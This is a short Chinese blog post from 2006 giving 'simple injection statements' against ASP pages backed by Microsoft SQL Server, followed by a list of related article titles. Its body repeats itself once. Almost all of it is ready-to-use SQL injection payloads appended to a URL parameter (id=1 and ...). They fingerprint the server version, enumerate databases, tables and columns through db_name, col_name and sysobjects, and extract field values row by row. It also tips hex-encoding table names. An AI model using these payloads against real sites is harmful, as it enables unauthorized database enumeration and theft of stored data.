注入的几条简单语句
2006-08-05 15:08
239 查看
一、版本
url/1.asp?id=1 and @@VERSION>0
二、跨库
url/1.asp?id=1 and 1=(select db_name(n))
n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?
三、列名
url/1.asp?id=1 and 1=(select col_name(object_id('表名'),n) '表名'可以换成16进制。像bbsuser=0x6200620073007500730065007200(不可以去掉0)
四、表名字段值
select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('表名1,表名2'))
字段值:
select top 1 列名 from 表名 where 列名 not in (select top n 列名 from 表名)
n改1,2,3,4就可以得库名、列名
url/1.asp?id=1 and @@VERSION>0
二、跨库
url/1.asp?id=1 and 1=(select db_name(n))
n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?
三、列名
url/1.asp?id=1 and 1=(select col_name(object_id('表名'),n) '表名'可以换成16进制。像bbsuser=0x6200620073007500730065007200(不可以去掉0)
四、表名字段值
select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('表名1,表名2'))
字段值:
select top 1 列名 from 表名 where 列名 not in (select top n 列名 from 表名)
n改1,2,3,4就可以得库名、列名
相关文章推荐
- 注入的几条简单语句,不用像网上那样复杂
- 注入的几条简单语句,不用像网上那样复杂
- 注入的几条简单语句
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 用Python简单处理SQL语句绕过防注入
- php web开发安全之sql注入和防范:(一)简单的select语句注入和防范
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单对比几条查询语句的执行时间
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 几条简单的MSSQL暴表语句
- 几条简单的MSSQL暴表语句
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 我的学习笔记(SQL简单的注入)(1) 手工注入以及注入一些常用语句
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性